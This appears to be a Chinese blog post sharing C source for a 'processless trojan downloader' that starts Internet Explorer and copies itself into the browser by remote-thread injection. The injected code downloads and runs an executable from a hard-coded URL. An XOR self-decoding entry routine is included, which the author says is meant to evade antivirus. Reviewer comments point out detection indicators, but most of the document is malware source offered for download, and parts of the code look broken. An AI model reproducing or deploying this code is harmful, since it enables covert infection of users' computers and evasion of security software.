VC无进程木马下载器源码(利用IE隐藏进程)
一、打开半年前的一个工程,是一个利用IE隐藏进程进行下载的实例,我想灰鸽子也是类似原理吧!
下面是程序的主要思路:
1.获取程序自身路径,启动IE进程
2.获取到IE进程句柄
3.分配内存
4.获取进程映像的地址
5.得到内存镜像大小
6.确定起始基址和内存映像基址的位置
7.写内存,创建线程,写数据
8.建立远程线程并运行,关闭对象
二、下面是源码,以下载迅雷为例:
- /*
- VC无进程木马下载器
- By: Kardinal and 寂寞的狼
- 2009.3.10
- */
- #include <windows.h>
- #pragma comment(lib,"user32.lib")
- #pragma comment(lib,"kernel32.lib")
- //取消这4行的注释,可编译出2K大的文件
- //#pragma comment(linker,"/OPT:NOWIN98")
- //#pragma comment(linker,"/merge:.data=.text")
- //#pragma comment(linker,"/merge:.rdata=.text")
- //#pragma comment(linker,"/align:0x200")
- #pragma comment(linker,"/ENTRY:decrpt")
- #pragma comment(linker,"/subsystem:windows")
- #pragma comment(linker,"/BASE:0x13150000")
- // Function pointer for shell32's ShellExecuteA, resolved at run time with
- // GetProcAddress instead of being linked statically. Dynamic resolution keeps
- // the name out of the import table, so import-table inspection alone does not
- // show it; API-call monitoring does.
- HINSTANCE (WINAPI *SHELLRUN)(HWND,LPCTSTR,LPCTSTR,LPCTSTR,LPCTSTR,int);
- // Function pointer for urlmon's download routine, also resolved at run time
- // in download() under the name used there.
- DWORD (WINAPI *DOWNFILE)(LPCTSTR,LPCTSTR,LPCTSTR,DWORD,LPCTSTR);
- // Function pointer for kernel32's CreateRemoteThread; main() uses it to start
- // the copied code in the target process.
- HANDLE (WINAPI *MYINJECT) (HANDLE, LPSECURITY_ATTRIBUTES, DWORD,LPTHREAD_START_ROUTINE, LPVOID, DWORD, LPDWORD);
- // Forward declaration; decrpt() is the image entry point (see the /ENTRY linker pragma above).
- void decrpt();
- HANDLE processhandle; // handle of the target (Internet Explorer) process, read in main()
- DWORD pid;            // process id filled in by GetWindowThreadProcessId in main()
- HINSTANCE hshell,hurlmon,hkernel;// module handles (HINSTANCE and HMODULE are interchangeable)
- // Code that main() copies into the target process and starts there as a remote
- // thread. It resolves the APIs it needs at run time, downloads a hard-coded URL
- // to a fixed local path, launches the downloaded file with ShellExecuteA and
- // then calls ExitProcess on whatever process it is running in.
- // NOTE(review): the observable sequence -- LoadLibrary(urlmon), a URL download,
- // ShellExecute of a freshly written executable, ExitProcess -- issued from a
- // browser process is the behaviour host-based monitoring would alert on.
- void download()
- {
- hshell = LoadLibrary("Shell32.dll");
- hurlmon = LoadLibrary("urlmon.dll");
- // Resolve the two APIs by name (C++ reference-cast through FARPROC&).
- (FARPROC&)SHELLRUN = GetProcAddress(hshell,"ShellExecuteA");
- (FARPROC&)DOWNFILE = GetProcAddress(hurlmon,"UrlDownloadToFileA");
- // Hard-coded download URL and destination path.
- DOWNFILE(NULL,"http://down.sandai.net/Thunder5.9.5.990.exe","C://xunlei.exe",0,NULL);
- // Launch the downloaded file; nShowCmd 5 is SW_SHOW.
- SHELLRUN(0,"open","C://xunlei.exe",NULL,NULL,5);
- // Terminates the hosting process -- inside the target, that is the browser itself.
- ExitProcess(0);
- }
- // Injector. Starts Internet Explorer, locates its process, copies this module's
- // whole image into that process at the same base address, and starts a remote
- // thread at download(). MSVC x86 only: relies on inline assembly and on the
- // image being loaded at its preferred base (cf. the /BASE linker pragma).
- void main()
- {
- char iename[MAX_PATH],iepath[MAX_PATH];
- ZeroMemory(iename,sizeof(iename));
- ZeroMemory(iepath,sizeof(iepath));
- // 1. Build the IE path from the drive letter of the Windows directory and start it.
- GetWindowsDirectory(iepath,MAX_PATH);
- strncpy(iename,iepath,3);
- strcat(iename,"C://Program Files//Internet Explorer//IEXPLORE.EXE");
- WinExec(iename,SW_SHOWNORMAL);
- Sleep(500); // fixed wait for the IE window to appear
- // 2. Find the IE top-level window (class "IEFrame") and get its process id.
- HWND htemp;
- htemp = FindWindow("IEFrame",NULL);
- GetWindowThreadProcessId(htemp,&pid);
- // 3. Locals for the remote allocation.
- HMODULE Module;
- LPVOID NewModule;
- DWORD Size;
- LPDWORD lpimagesize;
- // 4. Base address of this process's own image.
- Module = GetModuleHandle(NULL);
- // 5. Read the image size from the PE header: [base+0x3c] is e_lfanew, and
- //    0x50 bytes into the NT headers is OptionalHeader.SizeOfImage (PE32).
- _asm
- {
- push eax;
- push ebx;
- mov ebx,Module;
- mov eax,[ebx+0x3c];
- lea eax,[ebx+eax+0x50];
- mov eax,[eax]
- mov lpimagesize,eax;
- pop ebx;
- pop eax;
- };
- Size=(DWORD)lpimagesize;
- // Reserve+commit the same address range in the target as the local image
- // occupies, so the copy runs without relocation; RWX so the copied code can execute.
- NewModule = VirtualAllocEx(processhandle, Module, Size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
- // 6. Copy the whole local image into the target process.
- WriteProcessMemory(processhandle, NewModule, Module, Size, NULL);
- // Take the address of download() as the remote thread start routine.
- LPTHREAD_START_ROUTINE entrypoint;
- __asm
- {
- push eax;
- lea eax,download;
- mov entrypoint,eax;
- pop eax
- }
- hkernel=LoadLibrary("KERNEL32.dll");
- (FARPROC&)MYINJECT= GetProcAddress(hkernel,"CreateRemoteThread");
- // Start the remote thread at download(); the remote address is meaningful
- // only because the copy sits at the same address as the local image.
- // NOTE(review): VirtualAllocEx(RWX) + WriteProcessMemory + CreateRemoteThread
- // against another process is the classic remote-thread injection sequence
- // (MITRE ATT&CK T1055) and is what endpoint monitoring keys on.
- MYINJECT(processhandle, NULL, 0, entrypoint, Module, 0, NULL);
- // 7. Release the process handle.
- CloseHandle(processhandle);
- return;
- } ;
- // Entry point (see /ENTRY:decrpt). The author calls this the "decryption"
- // routine: the bytes from download() up to decrpt() are presumably stored
- // XOR-encoded in the shipped binary. The routine makes that region writable,
- // saves a copy on the stack, then for each candidate single-byte key 1..0xFF
- // decodes the copy back in place and tries to run main() inside a __try block;
- // a fault from a wrongly decoded body is swallowed by __except and the next
- // key is tried.
- // NOTE(review): self-modifying code under a structured-exception retry loop is
- // itself a behavioural indicator, independent of the encoded payload bytes.
- void decrpt()
- {
- HANDLE myps;
- DWORD oldAttr;
- BYTE shellcode[500]; // stack copy of the encoded function bytes
- ZeroMemory(shellcode,sizeof(shellcode));
- myps=GetCurrentProcess();
- // Make the page containing download() writable so it can be patched in place.
- ::VirtualProtectEx(myps,&download,0x1000,PAGE_EXECUTE_READWRITE,&oldAttr);
- // Copy the bytes from download up to decrpt into shellcode (count = &decrpt - &download).
- _asm
- {
- pushad;
- lea esi,download;
- lea edi,shellcode;
- lea ecx,decrpt;
- sub ecx,esi;
- en1:
- lodsb;
- stosb;
- dec ecx;
- jne en1;
- popad;
- };
- // Decode back in place, trying every key in turn.
- int i;
- for (i=1;i<=0xFF;i++)
- {
- // XOR each saved byte with the current key i and write it back over the original code.
- _asm
- {
- pushad;
- lea esi,shellcode;
- lea edi,download;
- lea ecx,decrpt;
- sub ecx,edi;
- en2:
- lodsb;
- mov ebx,i;
- xor al,bl;
- stosb;
- dec ecx;
- jne en2;
- popad;
- };
- // Original author's comment: this construct is intended to keep ordinary
- // anti-virus from recognising the body as malicious. The decoded code is
- // exercised by calling main(); if it faults, the handler runs and the loop
- // continues with the next key.
- __try
- {
- main();
- return;
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- };
- }
- return;
- }
三、工程及源码下载地址:
http://download.csdn.net/source/1546155
http://www.rayfile.com/files/77ea8ad9-80ff-11de-aeb2-0014221b798a/